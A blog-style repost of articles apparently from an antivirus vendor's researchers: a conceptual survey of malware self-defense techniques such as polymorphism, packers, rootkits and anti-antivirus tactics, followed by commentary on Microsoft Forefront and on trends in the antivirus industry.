After all, one of the motivations behind virus writers searching for new platforms that can be infected and for new system loopholes is to spread new viruses in the wild, into areas where no one yet bothers to look for malicious code as nothing has been found there before.&lt;br /&gt;&lt;br /&gt;In order to avoid confusion about what is considered a self-defense technology and what is not, this article examines only the most popular and obvious means of malware self-defense. First and foremost this includes various means of modifying and packing code, in order to conceal the presence of malicious code in the system and to disrupt the functionality of antivirus solutions.&lt;br /&gt;&lt;br /&gt;Classifying malware self defense &lt;br /&gt;Sources: polymorphism, obfuscation and encryption &lt;br /&gt;Stealth viruses &lt;br /&gt;Packers &lt;br /&gt;Rootkits &lt;br /&gt;Combating antivirus solutions &lt;br /&gt;What will the future bring? &lt;br /&gt;Trends and forecasts &lt;br /&gt;Conclusion &lt;br /&gt;Classifying malware self defense&lt;br /&gt;There are many different kinds of malware self-defense techniques and these can be classified in a variety of ways. Some of these technologies are meant to bypass antivirus signature databases, while others are meant to hinder analysis of the malicious code. One malicious program may attempt to conceal itself in the system, while another will not waste valuable processor resources on this, choosing instead to search for and counter specific types of antivirus protection. These different tactics can be classified in different ways and put into various categories.&lt;br /&gt;&lt;br /&gt;As the goal of this article is not to create a strict classification system for malware self-defense techniques, let's consider a classification system that will provide an understanding of this issue at an intuitive level. 
We take the two criteria which we believe are the most important, and from there we will create a scatterplot with two axes representing those two criteria.&lt;br /&gt;&lt;br /&gt;The first criterion is a malicious program's level of self-defense activity. The most passive malware does not attempt to defend itself in any way, i.e. it does not contain any such code. Instead, the author creates a kind of protective shell for the program. More active self-defense systems involve deliberately aggressive techniques.&lt;br /&gt;&lt;br /&gt;The second criterion is the degree to which a malicious program's self-defense mechanism is dedicated. The most narrowly dedicated forms of self defense are found in malicious programs that somehow disrupt the function of a specific antivirus program. More general self-defense mechanisms are designed to defend malicious programs against everything by making the virus's presence in the system as undetectable as possible in every way.&lt;br /&gt;&lt;br /&gt;We have used a scatterplot to present the different kinds of malware self-defense mechanisms. This diagram is merely a simple example that we can use as a guide to categorize different means of malware self-defense. This model is based on a careful analysis of malware behaviors, but is, necessarily, subjective.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Figure 1. A scatterplot of malware self-defense technologies&lt;br /&gt;&lt;br /&gt;Malware self-defense mechanisms can fulfil one or more tasks. 
These include:&lt;br /&gt;&lt;br /&gt;hindering detection of a virus using signature-based methods; &lt;br /&gt;hindering analysis of the code by virus analysts; &lt;br /&gt;hindering detection of a malicious program in the system; &lt;br /&gt;hindering the functionality of security software such as antivirus programs and firewalls.&lt;br /&gt;This article will only examine malicious programs written for the Windows operating system (and its predecessor, DOS) due to the rarity and relatively small number of malicious programs for other platforms. All of the trends examined in this article apply to executable malware files (EXE, DLL and SYS), and to some extent also to macro viruses and script viruses, which is why I will not be addressing the latter separately.&lt;br /&gt;&lt;br /&gt;Sources: polymorphism, obfuscation and encryption&lt;br /&gt;It makes sense to examine polymorphism, obfuscation and encryption together, as they all fulfill the same end, albeit to different degrees. Initially, modification of malicious code had two goals: to make it more difficult to detect files and to make it more difficult for virus analysts to examine the code.&lt;br /&gt;&lt;br /&gt;The history of malware began in the 1970s, but the history of malware self-defense didn’t start until the late 1980s. The first virus that attempted to defend itself from the antivirus utilities then in existence was the DOS virus Cascade (Virus.DOS.Cascade). It defended itself by partially encrypting its own code. This wasn’t very successful, however, since each new copy of the virus - despite differing from previous copies - still contained an unaltered piece of code that gave it away every time. As a result, antivirus programs could still detect it. Nevertheless, virus writers were turning in a new direction, and within two years the first polymorphic virus appeared: Chameleon (Virus.DOS.Chameleon). 
Chameleon, also known as 1260, and its contemporary Whale, used complex encryption and obfuscation methods to protect their code. Two years later, we saw the emergence of so-called polymorphic generators, which could be used as out-of-the-box defense solutions for malicious programs.&lt;br /&gt;&lt;br /&gt;Why code modification can be used to hinder file detection, and how file detection works, needs some explanation.&lt;br /&gt;&lt;br /&gt;Until recently, antivirus programs worked exclusively by analyzing file code. The earliest signature-based detection methods focused on searching for exact byte sequences, often at a fixed offset from the beginning of the file, in a malicious program's binary code. Later heuristic detection methods also used file code, but with a more flexible, probability-based approach to searching for common malware byte sequences. Obviously, it’s not difficult for malicious programs to get around that kind of protection if each copy of the program includes a new byte sequence.&lt;br /&gt;&lt;br /&gt;This task is fulfilled by the application of polymorphic and metamorphic techniques, which essentially - without getting into the technological nitty-gritty – enable a malicious program to mutate at byte level when the program creates a copy of itself. Meanwhile, the program’s functionality remains unchanged. Encryption and obfuscation are primarily used to hinder code analysis, but when they are implemented in a certain way, the result can be a variation of polymorphism – an example here is again Cascade, where every copy of the virus was encrypted with a unique key. Obfuscation may just hinder analysis, but when it is applied in a different way to every copy of a malicious program, it hinders the effective use of signature-based detection methods. However, it cannot be said that any one of the abovementioned tactics is more effective than any other in terms of malware self-defense. 
It would be more correct to say that the effectiveness of these techniques depends on the specific circumstances and how the techniques are implemented.&lt;br /&gt;&lt;br /&gt;The use of polymorphism only became relatively widespread in terms of DOS file viruses. There's a reason for this. Writing polymorphic code is a highly time-consuming task that is really only justified in cases when a malicious program is self-replicating: then each new copy contains a more or less unique byte sequence. The majority of contemporary Trojans aren't able to self-replicate, and polymorphism is therefore irrelevant. That’s why since the end of the DOS file virus era, polymorphism has been seen less, and it was used mostly by virus writers who wanted to show off their skills rather than to create a particularly useful malicious function.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Figure 2. The polymorphic code of P2P-Worm.Win32.Polip&lt;br /&gt;&lt;br /&gt;In contrast, obfuscation continues to be used today, as are other code modification methods that, to a large extent, make it more difficult to analyze code as opposed to hindering detection.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Figure 3. A diagram of the obfuscated code in Trojan-Dropper.Win32.Small.ue&lt;br /&gt;&lt;br /&gt;Since behavioral detection methods arrived and began to squeeze out signature-based methods, code modification techniques have become less useful in hindering malware detection. This is why polymorphism and related technologies are not commonly used today and are only really a means for hindering the actual analysis of malicious code.&lt;br /&gt;&lt;br /&gt;Stealth viruses&lt;br /&gt;Concealing malicious programs in the system became the second method of self-defense against detection that was mastered by virus writers in the DOS era. This technique was first used in 1990; to be more precise, it was included in the arsenal of a virus we have already mentioned - Whale. 
Essentially, the concealed virus would one way or another intercept DOS system services and pass false data to the user or the antivirus program – for instance, "clean" boot sector contents, instead of the real contents which had been infected by the malicious program.&lt;br /&gt;&lt;br /&gt;Stealth technologies for the DOS operating system were reborn as rootkit technologies for the Windows operating system 10 years later.&lt;br /&gt;&lt;br /&gt;The mechanisms used to conceal viruses in the system are covered in more detail in the Rootkit section.&lt;br /&gt;&lt;br /&gt;Packers&lt;br /&gt;Gradually, viruses - malicious programs that can function only within a victim body and which are unable to exist as a separate file - are being replaced by Trojans, which are fully independent malicious programs. This process began when the Internet was still slow and more limited than it is today. Hard disks and floppy disks were small, which meant that the size of a program was very important. In order to reduce the size of a Trojan, virus writers began to utilize so-called packers - even back in the DOS era. Packers are dedicated programs that compress and archive files.&lt;br /&gt;&lt;br /&gt;A side effect of using packers that can actually be useful from a malware point of view is that packed malicious programs are more difficult to detect using file methods.&lt;br /&gt;&lt;br /&gt;When creating a new modification of an existing malicious program, the virus writer usually changes several lines of code, while leaving the heart of the program untouched. In the compiled file, the bytes for a certain sequence of code will also be altered and if the antivirus signature does not include that very sequence, then the malicious program will still be detected as before. Compressing a program with a packer solves this problem as changing even just one byte in the source executable results in an entirely new byte sequence in the packed file.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Figure 4. 
The visible difference between packed and unpacked code&lt;br /&gt;&lt;br /&gt;Packers are still commonly used today. The variety of packing programs and their level of sophistication continue to grow. Many modern packers, in addition to compressing a source file, also equip it with additional self-defense functions aimed at hindering the unpacking and analysis of the file using a debugger.&lt;br /&gt;&lt;br /&gt;Rootkits&lt;br /&gt;Malicious programs for the Windows operating system started using stealthing technologies to hide their presence in the system in the first years of the new millennium. As mentioned above, this was approximately 10 years after stealthing programs appeared as a concept and were implemented for DOS. In early 2004, Kaspersky Lab encountered a surprising program that couldn't be seen in the Windows processes and files list. For many antivirus experts, this was a new beginning – understanding stealthing technologies for malicious programs for Windows – and it was the harbinger of a major new trend in the virus writing industry.&lt;br /&gt;&lt;br /&gt;The term “rootkit” stems from Unix utilities that are designed to provide a user with unsanctioned root access within the system without being noticed by the system administrator. Today, the word rootkit covers dedicated utilities used to conceal information in the system, as well as malicious programs with functionality which enables them to mask their presence. What gets concealed are the traces that any application registered in the system leaves behind: an entry in the list of processes, a file on disk, a registry key or even network traffic.&lt;br /&gt;&lt;br /&gt;How do rootkit technologies which are designed to conceal malicious programs in the system make it so difficult to detect the malicious programs using antivirus or other security software? It’s very simple: an antivirus utility is an external agent just like the user. 
Generally, if a user can't see something, then an antivirus program can't see it either. However, some antivirus solutions implement technologies which sharpen their vision, enabling them to detect rootkits when users cannot see them.&lt;br /&gt;&lt;br /&gt;A rootkit is based on the same principle as DOS stealth viruses. A large number of rootkits have mechanisms which modify a chain of system calls (Execution Path Modification). This kind of rootkit may act as a hook located at a certain point of a route along which commands or information are exchanged. It will modify these commands or information in order to distort them or control what happens on the recipient's end without the recipient's knowledge. Theoretically, the number of points at which a hook can be located is limitless. In practice, there are currently several different methods commonly used to hook APIs and kernel system functions. Examples of this kind of rootkit include the widely known utilities Vanquish and Hacker Defender and malicious programs such as Backdoor.Win32.Haxdoor, Email-Worm.Win32.Mailbot, and certain versions of Email-Worm.Win32.Bagle.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Figure 5. Hooking ZwQueryDirectoryFile conceals&lt;br /&gt;the driver file in the list of files&lt;br /&gt;&lt;br /&gt;Another common type of rootkit technology is Direct Kernel Object Modification (DKOM), which can be viewed as an insider that modifies information or commands directly in their sources. These rootkits alter system data. A typical example is the FU utility; the same functions can be found in Gromozon (Trojan.Win32.Gromp).&lt;br /&gt;&lt;br /&gt;A newer technology that officially corresponds to the rootkit classification conceals files in alternate data streams (ADS) in NTFS file systems. This technology was first implemented in 2000 in the malicious program Stream (Virus.Win32.Stream), and got a second wind in 2006 in the form of Mailbot and Gromozon. 
Strictly speaking, exploiting ADS is not so much a means of tricking the system as of taking advantage of little-known functions, which is why this particular technology isn't likely to become very widespread.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Figure 6. The malicious program Mailbot (Rustock) exploits&lt;br /&gt;the system directory stream&lt;br /&gt;&lt;br /&gt;There is another rare technology which only partially falls into the rootkit category (but it corresponds even less to the other classes of malware self-defense examined in this article). This technology uses bodiless files - this means malicious programs do not have any body whatsoever on the disk. There are currently two known representatives of this subgroup: Codered, which emerged in 2001 (Net-Worm.Win32.CodeRed) and exists in this form only within the context of MS IIS, and a recent proof of concept Trojan that stores its body in the registry.&lt;br /&gt;&lt;br /&gt;The modern rootkit trend aims towards the virtualization and use of system functions – in other words, penetrating even more deeply into the system.&lt;br /&gt;&lt;br /&gt;Combating antivirus solutions&lt;br /&gt;There have always been malicious programs that have actively defended themselves. Self-defense mechanisms include:&lt;br /&gt;&lt;br /&gt;Performing a targeted search of the system for an antivirus product, firewall or other security utility, followed by disrupting the functioning of that utility. An example might be a malicious program that searches for a specific antivirus product in the process list and subsequently attempts to disrupt the functioning of that antivirus. &lt;br /&gt;Blocking files and opening them with exclusive access as a countermeasure against file scanning by the antivirus. &lt;br /&gt;Modifying the hosts file in order to block access to antivirus update sites. 
&lt;br /&gt;Detecting query messages sent by the security system (for example, a firewall window with an inquiry such as "Allow this connection?") and imitating a click on the "Allow" button.&lt;br /&gt;Actually, a targeted attack against a security solution is more like the reaction of someone with their back against the wall than an active attack. In today’s conditions, when antivirus companies analyze more than the code contained in malicious programs - they analyze their behavior as well – malicious programs are more or less powerless. Neither polymorphism, nor packers, nor even stealth technologies will provide malicious programs with total protection. This is why malware has set its sights on certain manifestations or functions of the so-called enemy. Of course, sometimes self-defense mechanisms are the only solution; otherwise they would not be so common, as they pose too many disadvantages from the viewpoint of maximum, full-range defense.&lt;br /&gt;&lt;br /&gt;What will the future bring?&lt;br /&gt;Antivirus protection is continually evolving, moving from file analysis to program behavior analysis. In contrast to file analysis, the basics of which were explained in the section on polymorphism and obfuscation, behavior analysis is based not on working with files, but with events at system level, such as "list all active system processes," "create a file with this name in the directory shown," and "open the port indicated to incoming data." By analyzing the chain of these events, an antivirus program can calculate the extent to which the component generating these processes is potentially malicious, and give a warning when necessary.&lt;br /&gt;&lt;br /&gt;However, behavior analysis can get confusing when it comes to terminology, and it's not always easy to get things straightened out. 
For example, a behavioral analyzer may go by different names: HIPS, proactive protection, heuristic, or sandbox… However, regardless of the term, one thing remains clear: malicious programs are ultimately powerless in the face of behavioral analysis. This vulnerability will probably have an influence on the future evolution of malicious programs.&lt;br /&gt;&lt;br /&gt;In other words, virus writers are faced with the need to somehow work around behavior analyzers. There is no way to know how they will go about tackling this obstacle. But we do know, for example, that the use of obfuscation at the behavioral level is basically ineffective. The evolution of environmental diagnostics, however, is very interesting. This is because it assumes, in part, a rise in a virus's "self-awareness", which would allow it to determine where exactly it is located: in the "real world" (in a user's clean working environment) or in the "matrix" (under the control of antivirus analysis).&lt;br /&gt;&lt;br /&gt;Diagnostic technologies do have their precedents: some malicious programs, if they are launched in a virtual environment (such as VMware or Virtual PC), destroy themselves immediately. By building this self-destruction mechanism into a malicious program, its author prevents its analysis, which is often conducted within a virtual environment.&lt;br /&gt;&lt;br /&gt;Trends and forecasts&lt;br /&gt;Having examined current trends and how effective current approaches are, we can expect the following from the methods of malware self-defense discussed above:&lt;br /&gt;&lt;br /&gt;Rootkits are moving towards exploiting equipment functions and towards virtualization. This method, however, has not yet reached its peak and probably won’t become a major threat in the years to come, nor will it be widely used. &lt;br /&gt;Technology which blocks files on disk: two known proof of concept programs have demonstrated it, and we can expect this area to develop in the near future. 
&lt;br /&gt;The use of obfuscation technologies is insignificant, but nevertheless still current. &lt;br /&gt;The use of technologies that detect security utilities and interrupt their performance is very common and widely used. &lt;br /&gt;The use of packers is widespread and is growing steadily (both in quantitative and qualitative terms). &lt;br /&gt;The use of technologies that detect debuggers, emulators and virtual machines, as well as other environmental diagnostic technologies, is expected to develop in order to compensate for the mass transition of antivirus products to behavioral analysis. &lt;br /&gt;&lt;br /&gt;Figure 7. An approximate breakdown of malware self-defense&lt;br /&gt;technologies as of early 2007&lt;br /&gt;&lt;br /&gt;It’s not difficult to see that the evolution trends in malware self-defense technologies are changing in step with the evolution of malicious programs themselves, as well as protection against malware. When most malicious programs infected files and antivirus programs used signature-based detection, the most prevalent forms of malware self-defense were polymorphism and code protection. Today, malicious programs are mostly independent, and antivirus programs are becoming increasingly proactive. Based on these facts, we can predict which malware self-defense mechanisms will develop more intensively than others:&lt;br /&gt;&lt;br /&gt;Rootkits. Their invisibility within a system gives them a clear advantage - even if it doesn’t prevent their detection. We can most likely expect new kinds of bodiless malicious programs and, a little later, the implementation of virtualization technologies. &lt;br /&gt;Obfuscation and encryption. This method will remain common as long as it continues to hinder code analysis. &lt;br /&gt;Technologies used to counter security solutions which are based on behavioral analysis. 
We can expect the appearance of some new technologies, since the ones that are currently being used (targeted attacks against antivirus programs) are not effective. It's possible that we will see some methods of detecting virtual environments or a type of behavioral encryption.&lt;br /&gt;&lt;br /&gt;Conclusion&lt;br /&gt;What else can we say in conclusion? The mere existence of malicious programs has led to the existence and development of protection against them. And now we will see the emergence and development of malware self-defense against protection against malware. This brings up images of a never-ending conflict, where nature is red in tooth and claw.&lt;br /&gt;&lt;br /&gt;In the last few years the situation has become increasingly critical. Someone from the cybercriminal underground (or “researchers” dressed in white hats) develops proof of concept code to evade modern means of protection. This person will, for self-promotion purposes and feigning concern about progress, announce that the code is “undetectable”. But we need to emphasize that this concept will be undetectable only at the level of one- or two-step bypass of known security functions, rather than 100% undetectable. It is relatively easy to create a one-step work-around if you are familiar with protection mechanisms.&lt;br /&gt;&lt;br /&gt;Such publications cause concern among a certain percentage of users who are not familiar with the way malicious programs and antivirus programs work ("Will my antivirus protect me against this new type of threat?"). In this situation, the people creating self-defense methods have only to chip in a share of their resources in order to restore their reputation and develop a work-around - usually a one-step bypass. In the end, their reputation is saved (of course), the malware - antivirus - user system returns to its initial state, and we are again faced with the same vicious cycle. 
Each new iteration gives rise to even more sophisticated malware and more heavyweight means of defense.&lt;br /&gt;&lt;br /&gt;I want to emphasize that this process uses up a lot of resources, is senseless and endless, and recently, it has become even more exaggerated. All three parties in this conflict need to raise their awareness of the situation. I urge users to expand their understanding, to acknowledge that no means of protection can provide 100% security, and the best way to protect yourself against threats is to prevent them. I challenge conceptualists to reconsider their intentions and motives behind publishing a PoC that will only add fuel to the fire. And I call on the "protectors" to force themselves to think outside the box, and to try to keep more than one step ahead of the enemy. We may not be able to see the end of this so-called arms race, but we can keep it from spiraling out of control.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;* Polymorphism — a technology that allows a self-replicating program to fully or partially modify its outward appearance and/or the structure of its code during the replication process.&lt;br /&gt;&lt;br /&gt;* Obfuscation — a combination of approaches used to obscure the source code of a program. This is designed to make the code as difficult as possible to read and analyze while retaining full functionality. Obfuscation technologies can be applied at the level of any programming language (including high level, script and assembler languages). 
Examples of very simple obfuscation include adding neutral instructions (which do not alter program functionality) to the code or making the code harder to read by using an excessive number of unconditional jumps (or unconditional jumps disguised as conditional jumps).&lt;br /&gt;&lt;br /&gt;* This is a reference to a couple of terms used in computer security jargon: a Black Hat (a malicious hacker) and a White Hat (a security professional who uses hacking techniques for legal, ethical ends).&lt;br /&gt;&lt;br /&gt;Managing Protection&lt;br /&gt;&lt;br /&gt;Usability at the Forefront&lt;br /&gt;Microsoft representatives are pushing Forefront as a highly usable system for monitoring and managing all network nodes. Of course, Microsoft made its name by developing products which concentrate on usability. I have no doubt that Forefront will live up to expectations in this area. However, there are several issues relating to the release of Forefront which will worry security professionals.&lt;br /&gt;&lt;br /&gt;My main concern in reading the related PR was that the focus is mainly on manageability versus security. I find this very worrisome indeed.&lt;br /&gt;&lt;br /&gt;Manageability is of course a key issue in a security solution, but in my opinion, it can't replace quality detection. If a solution can't detect threats, there will be nothing left to manage. Given that threats today are specifically designed to evade detection for as long as possible, quality of detection has to be at the forefront in choosing a product. You need an anti-virus solution that detects threats. First and foremost. Managing the solution is definitely secondary.&lt;br /&gt;&lt;br /&gt;Certification vs. 
Comparatives&lt;br /&gt;I was astonished when I read that Margaret Arakawa, senior director of Security and Access Product Management at Microsoft, was reported as saying that the myriad tests such as AV-Comparatives.org's don't matter to the industry—rather, what matters are the two standards for certification that OneCare has in fact passed: West Coast Labs and ICSA Labs. &lt;br /&gt;&lt;br /&gt;Given that independent testing is routinely conducted in all industries where the security of the end user is at stake – medicine, the automotive industry, airplane construction, etc. – this is a very odd statement. Independent tests are necessary simply because different companies produce goods and services to different standards. When it comes to information security, testing the quality of solutions is crucial: malware is not only becoming more and more sophisticated, but it's also increasingly designed to make money for well-organized cyber criminals. Independent tests should effectively evaluate detection rates, the speed of response to new threats, the resources required to run each solution, and the stability of the solution itself. &lt;br /&gt;&lt;br /&gt;Testing bodies provide either certification tests (such as West Coast Labs, ICSA Labs), or comparative tests, where products compete against each other (such as AV-Test.org and AV-Comparatives.org). Some organizations provide a combination, such as Virus Bulletin which offers the VB100% award and also publishes the results of comparative tests. Certification confirms that a given solution meets or exceeds the minimum requirements of a test; in the AV world, certification guarantees a certain standard of AV functionality and the ability to detect the test viruses. Comparative tests, on the other hand, go further and evaluate the qualitative difference between products that have been acknowledged as meeting basic requirements in an imperfect world. 
Naturally, we can debate about testing methods and find fault with the methodology of any given testing organization. However, I think we, as a collective industry, agree that independent tests are crucial for the AV industry; both in terms of keeping vendors on their toes and in giving consumers a reasonably unbiased view of how available solutions compare against each other. &lt;br /&gt;&lt;br /&gt;Microsoft, or at least Margaret Arakawa, appears to be asserting that independent tests don't matter. And people who follow Microsoft agree: for instance, Michael Cherry, an analyst with Directions on Microsoft, said "The criteria may not be how good signature files are in the future. Frankly, they're not that far off from each other [as it is]. [The other companies who participated in the tests that OneCare flunked] didn't do so well themselves in those tests.” Poor excuse. &lt;br /&gt;&lt;br /&gt;More Than Just Detection&lt;br /&gt;In the meantime, all the well-regarded comparative tests prove that AV products differ greatly in terms of detection rate, reaction speed to new threats, quality of proactive protection, strain on system resources and other parameters. Moreover, there are no visible signs that the difference is getting any smaller. In fact, in many areas (for instance, response speed) the gap is widening. This is true even in terms of the oldest standard used in comparing AV solutions – signature-based detection rates. Sadly, it seems that the expanding onslaught of cybercrime is accelerating at a much faster rate than the ability of many in the anti-virus industry to keep up. &lt;br /&gt;&lt;br /&gt;And the size of an organization doesn't guarantee success in the AV industry. Experience is key, size is not. A successful AV vendor needs professionals who are capable of combating current threats, predicting future trends and second-guessing the virus writers who've transformed themselves into an industry. 
&lt;br /&gt;&lt;br /&gt;Microsoft has enormous in-house experience in developing complex solutions that are user friendly and easy to manage. I am sure that Forefront Client Security will prove a highly usable, flexible solution for small and medium sized companies. But none of this will matter if Forefront fails to detect Trojans hiding in the network that are stealing passwords, transmitting confidential data to third parties etc. Wearing a bullet proof vest is not a fashion statement – it means that you want to survive in a critical situation. And it seems as if Microsoft has forgotten this important little detail in developing Forefront Client Security. It’s an unfortunate precedent. &lt;br /&gt;&lt;br /&gt;Anti-Virus Mechanism Industry&lt;br /&gt;&lt;br /&gt;Over the past few years, the antivirus industry has undergone some major changes. The market leader has changed (McAfee has lost ground to Symantec), some independent antivirus companies have either disappeared from the market or have been taken over (the Romanian company RAV and the Australian company VET), and new players (BitDefender, ClamAV) have appeared. However, before discussing this, the following factors should be highlighted:&lt;br /&gt;&lt;br /&gt;This article only deals with ‘standard’ antivirus solutions: for home computers, workstations, corporate file and mail servers. Arguably, antivirus solutions for smartphones could be included in this list. Virus attacks targeting mobile phones may not be particularly common at the moment, but the situation is likely to change radically - for the worse, naturally - in the next few years. This article does not examine hardware solutions (such as gateways, or routers with integrated virus scanning capability), or solutions for large UNIX systems. Nor does it cover other antivirus filters which are dedicated to specific tasks.&lt;br /&gt;&lt;br /&gt;Additionally, the discussion here is not concerned with the marketing side of the industry. 
Marketing undoubtedly has an influence on the market share of individual companies, but security solutions (a category which includes antivirus programs) aren’t washing powder or toothpaste. Ultimately, end users don’t choose a security solution because of the way it’s marketed. &lt;br /&gt;&lt;br /&gt;Obviously ‘standard’ antivirus solutions will continue to evolve. In order to understand the nature of such solutions and to identify trends, we need to determine the main factors currently influencing the antivirus industry.&lt;br /&gt;&lt;br /&gt;Factor 1: Continuing criminalization of the Internet&lt;br /&gt;Any society of a certain size (such as a town or a country) includes criminal elements. Crime levels are determined by the following factors:&lt;br /&gt;&lt;br /&gt;the size of the community (the bigger it is, the higher the number of potential and actual criminals)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;the level of economic development (it's easier to earn a living by honest means in more developed countries)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;the ability of law enforcement bodies (e.g. the police) to investigate crimes and imprison the perpetrators&lt;br /&gt;&lt;br /&gt;The Internet is no exception. Its size is immense, and many of the different countries which make up part of this community are economically undeveloped. A particular cause for concern is programs which advocate ‘cheap computers for poor third world countries’ - these further encourage criminal activity on the Internet. Statistics on the number of malicious programs originating from specific countries confirm this: the world leader in virus writing is China, followed by Latin America, with Russia and Eastern European countries not far behind.&lt;br /&gt;&lt;br /&gt;In terms of law enforcement, in the vast majority of cases investigating cybercrime is a complex task, particularly taking into account the fact that the Internet has no physical borders. 
&lt;br /&gt;&lt;br /&gt;Data which falls into the three categories listed above clearly indicates that not only is the level of criminal activity on the Internet already high, but that it will also continue to increase. One piece of evidence for this statement is that the amount of crimeware has increased twofold over the past year; this indicates that criminal activity on the Internet has doubled in the same space of time. There is no reason to suppose that this growth rate will slow in the future. &lt;br /&gt;&lt;br /&gt;The conclusion: pressure on antivirus companies will increase as they will have to analyze more and more malicious code. Companies that fail to detect new malicious programs quickly and thus leave their customers unprotected will suffer a decrease in their market share, and will not be capable of competing in this professional arms race.&lt;br /&gt;&lt;br /&gt;Factor 2: Increased variety of malware and attack methods &lt;br /&gt;Ten years ago, back in 1996, malicious programs fell into two categories: viruses and primitive Trojans. At that time, there was no such thing as malware which could be used for criminal ends. However, in the intervening decade, malware has become far more complex and varied: &lt;br /&gt;&lt;br /&gt;network worms&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;a wide range of Trojan programs, including Spyware&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;AdWare&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;malicious application of legitimate programs (such as keyloggers and remote administration utilities)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;a wide range of spam, from begging emails to blackmail&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;phishing - a clearly differentiated type of financial scam&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;network attacks and rackets&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;etc.&lt;br /&gt;&lt;br /&gt;The vast majority of malicious programs are written for Win32 systems. 
The number of malicious programs targeting Linux, Mac OS, and smartphones (running under a variety of operating systems) is still, as yet, insignificant. There have also been a handful of PoC viruses for 64 bit systems. &lt;br /&gt;&lt;br /&gt;The conclusion: antivirus companies have to be prepared to work with a wide variety of malware. This means not only releasing products but providing continued support: testing them, and releasing updates for the whole product range. Companies that cannot keep up with the very latest technological developments will not be able to break into new industry segments. Moreover, they will start to lose ground on their own territory, and current competitors or completely new players will take advantage of new market opportunities. &lt;br /&gt;&lt;br /&gt;Factor 3: Microsoft&lt;br /&gt;Microsoft is going to be seriously focusing on the security solutions market; this will include developing antivirus solutions. The antivirus industry is in a state of shock - everyone remembers Netscape and other independent projects, which either significantly lost market share or disappeared altogether after Microsoft produced similar products. Microsoft is planning to bring the following to the market:&lt;br /&gt;&lt;br /&gt;antivirus for home PCs&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;antivirus for workstations (planned for the future)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;solutions for MS Exchange (using the multi-engine Antigen from Sybari)&lt;br /&gt;&lt;br /&gt;Of course, the appearance of this commercial giant will be a heavy blow to other manufacturers. But just how heavy will the blow be?&lt;br /&gt;&lt;br /&gt;Users come in a range of shapes and sizes. So what factors influence them when buying an antivirus solution? &lt;br /&gt;&lt;br /&gt;A: Commodity: the user buys the cheapest antivirus, or the most attractively packaged.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;B: Branding: the user buys either a brand to which s/he has loyalty, or a branded product which has been successfully marketed. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;C: Branding: the user is determined not to buy a Microsoft product. Such consumers will not trust antivirus solutions produced by this manufacturer. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;D: Performance characteristics - the overall quality of the product. &lt;br /&gt;&lt;br /&gt;It’s clear that these factors, and the types of user described, don’t exist in any pure form. The factors which influence consumer choice will be a combination of A+B+C+D in varying degrees. If we’re talking about the home user market, factor B will have a significant influence. As Antigen uses several antivirus engines (including some very good ones), the corporate market will be influenced by B+D. In order to estimate Microsoft's future market share, and the losses which other antivirus companies will correspondingly suffer, the value of A, B, C, and D needs to be determined. This is a simple task which can be fulfilled via consumer surveys.&lt;br /&gt;&lt;br /&gt;Conclusions&lt;br /&gt;As shown above, there are three deciding factors which affect the condition of the antivirus industry:&lt;br /&gt;&lt;br /&gt;The criminalization of the Internet&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Various types of criminal activity&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Antivirus protection from Microsoft&lt;br /&gt;&lt;br /&gt;The antivirus market of the future will be heavily influenced by these three factors.&lt;br /&gt;&lt;br /&gt;So is it time to throw in the towel? &lt;br /&gt;The answer to this question is unclear. We should remember Microsoft’s first attempt to create an integrated antivirus solution, MSAV for MS-DOS in 1994. This attempt was unsuccessful. It’s rare to make the same mistake twice. 12 years have passed since 1994, and a lot has changed during that time. 
The most important thing is that consumer demand for quality has increased: detection rates, speed of reaction to the dramatically increased number of attacks, frequency of updates, proactive technologies.&lt;br /&gt;&lt;br /&gt;If a product is technically sound but does not offer better antivirus protection than Microsoft’s solution, it will more than likely be bought mainly by consumers influenced by factor C. If a product offers better protection than Microsoft’s antivirus together with a lower price, then it will appeal to buyers of all categories. Furthermore, if an antivirus developer’s engine is integrated into Antigen, then there is no need to worry about the future (as long as the engine continues to be used). Microsoft will not be selling the product itself, but taking a percentage from the vendor. And for Microsoft, that is the beauty of it: it can sit back and enjoy the profits (and the ideology of a “multi-engine solution" will transform the antivirus business into a trade in engines rather than products). &lt;br /&gt;&lt;br /&gt;It will be a different, rather sorry, story for those vendors whose antivirus engines are not integrated into Antigen. On the other hand, such companies should not, perhaps, be written off; as there's no solution which can provide 100% protection against all threats, the IT market (including the antivirus market) is extremely crowded. The more troublesome a disease, the more medicines will be taken to combat it: in a similar way, users plagued by computer viruses are ready to embrace new technologies to rid themselves of the problem, and this means they will be ready to embrace a variety of solutions, not only those from the software giant. The message to antivirus companies is clear: if the company is not only to survive, but to survive profitably, compatibility issues have to be solved. 
